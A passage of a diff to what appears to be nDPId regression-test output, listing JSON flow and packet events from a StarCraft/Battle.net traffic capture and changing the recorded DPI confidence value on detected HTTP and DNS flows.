{"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985308,"flow_last_seen":1437389985308,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985308,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1437389985308,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985308,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EaZAAIAGHAjAqAFkUO+6Gg3DAFAjjlJ6AAAAAIACIAD93gAAAgQFtAEDAwgBAQQC"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985320,"flow_last_seen":1437389985320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985320,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1437389985320,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985320,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EadAAIAGHAfAqAFkUO+6Gg3EAFAnGJJ3AAAAAIACIAC6VgAAAgQFtAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1437389985363,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985363,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcNyhhfoI45Se2ASOQiDbQAAAgQFtAAA"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1437389985363,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985363,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEahAAIAGHBLAqAFkUO+6Gg3DAFAjjlJ7coYX6VAQ+vDZQQAA"} -00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985308,"flow_last_seen":1437389985373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985373,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/live-event?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985308,"flow_last_seen":1437389985373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985373,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/live-event?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1437389985376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985376,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcQgMkzhJxiSeGASOQhdQAAAAgQFtAAA"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1437389985376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985376,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEapAAIAGHBDAqAFkUO+6Gg3EAFAnGJJ4IDJM4lAQ+vCzFAAA"} -00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985320,"flow_last_seen":1437389985385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/homepage?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985320,"flow_last_seen":1437389985385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/homepage?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985434,"flow_last_seen":1437389985434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985434,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1437389985434,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985434,"pkt":"hCYVPnXEIImEa8W6CABFAAA0AOhAAIAGLLjAqAFkUO+6KA3FAFDb6m0AAAAAAIACIAAq7AAAAgQFtAEDAwgBAQQC"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985446,"flow_last_seen":1437389985446,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985446,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1437389985446,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985446,"pkt":"hCYVPnXEIImEa8W6CABFAAA0AOlAAIAGLLfAqAFkUO+6KA3GAFDf523sAAAAAIACIAAmAgAAAgQFtAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1437389985486,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985486,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGeqhQ77oowKgBZABQDcUKff272+ptAWASOQgysAAAAgQFtAAA"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1437389985486,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985486,"pkt":"hCYVPnXEIImEa8W6CABFAAAoAOxAAIAGLMDAqAFkUO+6KA3FAFDb6m0BCn39vFAQ+vCIhAAA"} -00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985434,"flow_last_seen":1437389985495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437389985495,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/live-events.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985434,"flow_last_seen":1437389985495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437389985495,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/live-events.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1437389985499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985499,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGeqhQ77oowKgBZABQDcb00A3Z3+dt7WASOQgzVQAAAgQFtAAA"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1437389985499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985499,"pkt":"hCYVPnXEIImEa8W6CABFAAAoAO5AAIAGLL7AqAFkUO+6KA3GAFDf523t9NAN2lAQ+vCJKQAA"} -00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985446,"flow_last_seen":1437389985508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437389985508,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/client-homepage.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985446,"flow_last_seen":1437389985508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437389985508,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/client-homepage.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985821,"flow_last_seen":1437389985821,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1437389985821,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1437389985821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1437389985821,"pkt":"hCYVPnXEIImEa8W6CABFAABGX2kAAIARVovAqAFkwKgB\/tisADUAMndemisBAAABAAAAAAAAC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAAAAQAB"} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985821,"flow_last_seen":1437389985821,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1437389985821,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"bnetcmsus-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985821,"flow_last_seen":1437389985821,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1437389985821,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"bnetcmsus-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1437389985852,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1437389985852,"pkt":"hCYVPnXEIImEa8W6CABFAABGX2oAAIARVorAqAFkwKgB\/tisADUAMndemisBAAABAAAAAAAAC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAAAAQAB"} 00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1437389985882,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1437389985882,"pkt":"IImEa8W6hCYVPnXECABFAAC0AABAAEARtYbAqAH+wKgBZAA12KwAoDk1miuBgAABAAQAAAAAC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAAAAQABwAwABQABAAAAGwAlC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAllZGdlc3VpdGXAIcA2AAUAAQAAUvQAEQVhMTk2MQFnBmFrYW1hacAhwGcAAQABAAAAEwAEAuQucMBnAAEAAQAAABMABALkLms="} -00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389985821,"flow_last_seen":1437389985882,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1437389985882,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"bnetcmsus-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.228.46.112"}} +00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389985821,"flow_last_seen":1437389985882,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1437389985882,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"bnetcmsus-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.228.46.112"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985891,"flow_last_seen":1437389985891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985891,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1437389985891,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985891,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LN5AAIAG2oXAqAFkAuQucA3HAFCKhzd4AAAAAIACIACLmQAAAgQFtAEDAwgBAQQC"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985892,"flow_last_seen":1437389985892,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985892,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -222,7 +222,7 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1437389985923,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985923,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOJAAIAG2oHAqAFkAuQucA3LAFDKy4tMAAAAAIACIAD3fAAAAgQFtAEDAwgBAQQC"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1437389985923,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985923,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDccmQrPVioc3eYASOQiYawAAAgQFtAEBBAIBAwMF"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1437389985923,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985923,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLONAAIAG2ozAqAFkAuQucA3HAFCKhzd5JkKz1lAQAQARRAAA"} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985891,"flow_last_seen":1437389985925,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/gc\/GCF1DHMH8FDY1434670037434.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985891,"flow_last_seen":1437389985925,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/gc\/GCF1DHMH8FDY1434670037434.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985925,"flow_last_seen":1437389985925,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1437389985925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985925,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOVAAIAG2n7AqAFkAuQucA3MAFCmW5TdAAAAAIACIAASWwAAAgQFtAEDAwgBAQQC"} 